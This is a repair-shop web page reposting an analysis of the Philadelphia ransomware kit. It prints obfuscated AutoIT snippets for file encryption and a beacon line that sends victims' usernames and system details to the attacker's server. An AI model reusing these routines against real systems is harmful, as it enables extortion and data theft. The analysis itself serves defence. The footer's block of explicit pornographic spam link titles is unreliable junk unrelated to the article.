錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠(chéng)服務(wù),錦州廣廈維修電腦,公司IT外包服務(wù)
topFlag1 設(shè)為首頁(yè)
topFlag3 收藏本站
 
maojin003 首 頁(yè) 公司介紹 服務(wù)項(xiàng)目 服務(wù)報(bào)價(jià) 維修流程 IT外包服務(wù) 服務(wù)器維護(hù) 技術(shù)文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠(chéng)服務(wù)技術(shù)文章
最具同情心的勒索軟件套件Philadelphia

作者: 佚名  日期:2017-04-18 22:02:09   來(lái)源: 本站整理

 最具同情心的勒索軟件套件Philadelphia。最近,一種新型的勒索軟件服務(wù)(RaaS)名為Philadelphia,開始向外以400美元的價(jià)格售賣,這個(gè)惡意軟件作者的名為Rainmaker。據(jù)Rainmaker所說(shuō),該程序套件提供一種低成本的勒索軟件服務(wù),它允許任何一個(gè)有犯罪意圖的人發(fā)動(dòng)高級(jí)的勒索軟件攻擊,并且它操作簡(jiǎn)單,成本低。

同時(shí),據(jù)Rainmaker介紹,Philadelphia“創(chuàng)新”勒索軟件服務(wù)市場(chǎng),它具有自動(dòng)檢測(cè)功能:當(dāng)付款已經(jīng)完成,然后自動(dòng)解密;感染USB驅(qū)動(dòng)器,并通過(guò)網(wǎng)絡(luò)感染其他計(jì)算機(jī)。 特別值得注意的是,“同情按鈕”將提供給賦有同情心的犯罪分子解密特定受害者的文件。 為了演示這種新的勒索軟件服務(wù),Rainmaker創(chuàng)建了一個(gè)顯示其功能的PDF和視頻。

感染癥狀

當(dāng)文件被加密后,文件名稱將被更改為.lock后綴的文件名。例如文件test.jpg可能會(huì)變成7B205C09B88C57ED8AB7C913263CCFBE296C8EA9938A.locked. 加密完成后會(huì)顯示下面的鎖屏圖像:

\

如上圖所示,受害者被要求支付0.3比特幣,并且勒索軟件聲稱加密文件的算法使用了AES-256和RSA-2048。最后勒索軟件作者將重要的事情說(shuō)了3遍——發(fā)送0.3比特幣到下面的地址!!!

樣本分析

通過(guò)進(jìn)一步觀察,該惡意軟件是由AutoIT腳本編寫并打包生成。通過(guò)反編譯該AutoIT惡意程序,我們發(fā)現(xiàn)了其中的兩個(gè)不同的版本。因此我們將分別分析它們。

V1.0

將自身拷貝到%appdata%\scvhost.exe,并且列出了待加密文件的類型:

\

添加開機(jī)自啟動(dòng):

\

待加密的目錄:

\

加密 加密硬盤,可移動(dòng)硬盤,網(wǎng)絡(luò)映射:

\
\

經(jīng)過(guò)混淆的加密文件算法:

$48E2CB6EE27D6950 &= _48E2CBFBE08D6950 ( 0 , STRINGTRIMRIGHT ( $48E02B6BE07D6950 [ $48E02B6BE07D6950 [ 0 ] ] , STRINGLEN ( ".locked" ) ) , $48E21B4BE07D6950 )

IF _48E2CB6BE0E16950 ( $48E30B6BE07D6950 , $48E2CB6EE27D6950 , $48E21B4BE07D6950 , $48E2CB6BC77D6950 ) AND NOT @ERROR THEN

_48E2BB6BE0CD6950 ( $48E30B6BE07D6950 )

用于加密的 Windows 庫(kù)函數(shù)的初始化:

$48E24B6BE07D6950 = DLLCALL ( _48E2CB64B07D6950 ( ) , "bool" , "CryptCreateHash" , "handle" , _48E2CBDBE00D6950 ( ) , "uint" , $48E2CB63E07D6950 , "ptr" , 0 , "dword" , 0 , "handle*" , 0 )

$48E24B6BE07D6950 = DLLCALL ( _48E2CB64B07D6950 ( ) , "bool" , "CryptHashData" , "handle" , $48E2CB6B407D6950 , "struct*" , $48E2CB6BE02D6950 , "dword" , DLLSTRUCTGETSIZE ( $48E2CB6BE02D6950 ) , "dword" , $48E2CB6BE0ED6950 )

$48E24B6BE07D6950 = DLLCALL ( _48E2CB64B07D6950 ( ) , "bool" , "CryptDeriveKey" , "handle" , _48E2CBDBE00D6950 ( ) , "uint" , $48E2CB3BE07D6950 , "handle" , $48E2CB6B407D6950 , "dword" , $48E28B6BE07D6950 , "handle*" , 0 )

$48E24B6BE07D6950 = DLLCALL ( _48E2CB64B07D6950 ( ) , "bool" , "CryptEncrypt" , "handle" , $48E27B6BE07D6950 , "handle" , 0 , "bool" , $48E2CD6BE07D6950 , "dword" , 0 , "ptr" , 0 , "dword*" , BINARYLEN ( $48E2BB6BE07D6950 ) , "dword" , 0 )

經(jīng)過(guò)對(duì)上面混淆過(guò)后的代碼回溯跟蹤和分析,函數(shù) _48E2CB6BE0E16950() 用來(lái)加密文件, 變量$48E2CB6BC77D6950是加密文件函數(shù)的一個(gè)重要參數(shù),繼續(xù)向上找發(fā)現(xiàn)該變量的初始化代碼:

GLOBAL CONST $48E2CB6BC77D6950 = 26128 //0x6610 CALG_AES_256

正如惡意軟件所描述的,采用了AES-256加密算法,但是我們沒有看到RSA加密算法。

生成隨機(jī)數(shù)作為密鑰:

\

V2.0

新的版本在大的功能方面和核心算法方面并沒有太大的變化,故不作重復(fù)列舉,以下只列出與舊版本不同的部分。

通過(guò)反編譯我們發(fā)現(xiàn),新版本的勒索軟件Philadelphia釋放了一個(gè)INI文件作為惡意軟件的配置文件。

互斥體名,UAC,C2, 提示信息:

\

待加密的目錄:

\

待加密的文件類型,釋放的文件名,文件路徑:

\

由此我們可以看出,新版本的惡意程序擺脫了”硬編碼”,通過(guò)設(shè)置配置文件來(lái)根據(jù)需要更改加密的具體細(xì)節(jié)。除此之外,我們?cè)谛掳姹局羞發(fā)現(xiàn)一個(gè)有趣的地方:

\

處于好奇,我們Google此人”Fabian” ,我們發(fā)現(xiàn)此人很可能是 Fabian Wosar, 此人正是 Emsisoft 的反病毒研究員,繼續(xù)搜索我們發(fā)現(xiàn),此前Emsisoft 宣布可以解密勒索軟件Philadelphia。 但是從代碼分析來(lái)看,新的版本加密文件的算法依然是AES-256,由此我們得出此勒索軟件加密后的文件依舊可以解密而不需要交贖金。由此再來(lái)看這段代碼,讓人啼笑皆非。

最后,惡意程序?qū)⑸蟼魇芨腥菊哂?jì)算機(jī)的相關(guān)信息到攻擊者的服務(wù)器:

$C1 = _HL ( STRING ( $BU & "?p=Insert&osinfo=" & _HI ( @OSVERSION ) & "&user=" & _HI ( @USERNAME ) & "&country=" & _HI ( $BX ) & "&locale=" & _HI ( $BY ) & "&ucd=" & _HI ( $BZ ) ) )

\

勒索軟件管理客戶端

對(duì)于發(fā)動(dòng)Philadelphia勒索軟件的攻擊者,他們需要在網(wǎng)站上安裝一個(gè)名為”網(wǎng)橋”的PHP腳本。 這些”網(wǎng)橋”將與勒索軟件感染者連接,并存儲(chǔ)有關(guān)受害者的加密密鑰等信息。然后,攻擊者在其計(jì)算機(jī)上運(yùn)行名為Philadelphia總部的管理客戶端,該管理客戶端將連接到每個(gè)配置的”網(wǎng)橋”,并將受害者數(shù)據(jù)下載到其管理控制臺(tái)。 這個(gè)客戶端允許攻擊者看到誰(shuí)被感染,哪些國(guó)家感染最多,甚至如果有同情心的攻擊者想允許某人免費(fèi)解密他們的文件,甚至提供憐憫的按鈕。如圖:

\

Sha1:

9f906472665f6447dd24da499d6e0f7ebe119c82

63e74c51b8e8a2f4e5b7f4c43fd7b3e816e1b367

總結(jié)

手動(dòng)分析這種基于AutoIT勒索程序樣本的難度并不大,但是通過(guò)強(qiáng)的代碼混淆技術(shù),反調(diào)試,反模擬器等技術(shù)的運(yùn)用,的確給殺毒軟件的識(shí)別和查殺帶來(lái)了難度。同時(shí),勒索軟件出售服務(wù)的出現(xiàn),加大了網(wǎng)絡(luò)攻擊的可能性,并降低了非專業(yè)技術(shù)人員實(shí)施網(wǎng)絡(luò)攻擊的難度,這值得我們警惕。



熱門文章
  • 機(jī)械革命S1 PRO-02 開機(jī)不顯示 黑...
  • 聯(lián)想ThinkPad NM-C641上電掉電點(diǎn)不...
  • 三星一體激光打印機(jī)SCX-4521F維修...
  • 通過(guò)串口命令查看EMMC擦寫次數(shù)和判...
  • IIS 8 開啟 GZIP壓縮來(lái)減少網(wǎng)絡(luò)請(qǐng)求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對(duì)講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機(jī)始終停留在開機(jī)界面...
  • 常見打印機(jī)清零步驟
  • 安裝驅(qū)動(dòng)時(shí)提示不包含數(shù)字簽名的解...
  • 共享打印機(jī)需要密碼的解決方法
  • 圖解Windows 7系統(tǒng)快速共享打印機(jī)的...
  • 錦州廣廈電腦上門維修

    報(bào)修電話:13840665804  QQ:174984393 (聯(lián)系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號(hào):遼ICP備2023002984號(hào)-1
    上門服務(wù)區(qū)域: 遼寧錦州市區(qū)
    主要業(yè)務(wù): 修電腦,電腦修理,電腦維護(hù),上門維修電腦,黑屏藍(lán)屏死機(jī)故障排除,無(wú)線上網(wǎng)設(shè)置,IT服務(wù)外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設(shè)置,數(shù)據(jù)恢復(fù),密碼破解,光盤刻錄制作等服務(wù)

    技術(shù)支持:微軟等
    主站蜘蛛池模板: 啊灬啊别停灬用力啊无码视频 | 日韩AV高清无码| 精品亚洲A∨无码一区二区三区 | 亚洲AV无码XXX麻豆艾秋| 91无码人妻精品一区二区三区L| 久久亚洲精品无码VA大香大香| 国产精品久久无码一区二区三区网| 免费无码又爽又黄又刺激网站| 精选观看中文字幕高清无码| 国产AV无码专区亚洲Av| 无码里番纯肉h在线网站| 亚洲无码在线播放| 一级电影在线播放无码| 亚洲精品无码国产片| 亚洲av无码国产精品色午夜字幕| 无码永久免费AV网站| 国产精品ⅴ无码大片在线看| 成人免费无码大片A毛片抽搐色欲| 久久久久亚洲AV无码永不| 无码熟妇人妻av| 精品久久久无码21p发布| 亚洲AV无码不卡无码| 亚洲AV无码一区二区乱孑伦AS| 国产色综合久久无码有码| 国产精品无码AV天天爽播放器| 亚洲美免无码中文字幕在线| 国精无码欧精品亚洲一区| 成在线人免费无码高潮喷水| 亚洲免费日韩无码系列| 国产精品亚洲专区无码唯爱网| 91精品久久久久久无码| 人妻无码第一区二区三区| 日韩精品无码一区二区三区 | 一本无码中文字幕在线观| 国产精品午夜无码av体验区| 国产精品无码免费播放| 亚洲Av无码国产情品久久| 一级毛片中出无码| 日韩少妇无码喷潮系列一二三| 国产成人无码网站| r级无码视频在线观看|